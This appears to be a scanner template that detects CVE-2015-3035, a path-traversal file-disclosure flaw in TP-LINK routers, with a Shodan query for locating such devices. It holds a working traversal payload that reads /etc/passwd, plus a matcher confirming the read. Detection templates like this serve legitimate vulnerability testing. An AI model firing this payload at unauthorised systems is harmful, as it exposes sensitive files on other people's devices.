33 lines
827 B
YAML
33 lines
827 B
YAML
|
id: CVE-2015-3035
|
||
|
|
||
|
info:
|
||
|
name: Multiple TP-LINK Products Vulnerable - Local File Inclusion
|
||
|
author: 0x_Akoko
|
||
|
severity: high
|
||
|
description: |
|
||
|
Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.
|
||
|
reference:
|
||
|
- https://seclists.org/fulldisclosure/2015/Apr/26
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-3035
|
||
|
classification:
|
||
|
cve-id: CVE-2015-3035
|
||
|
metadata:
|
||
|
verified: true
|
||
|
shodan-query: http.title:"TP-LINK"
|
||
|
tags: cve,cve2015,tplink,router,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/login/../../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|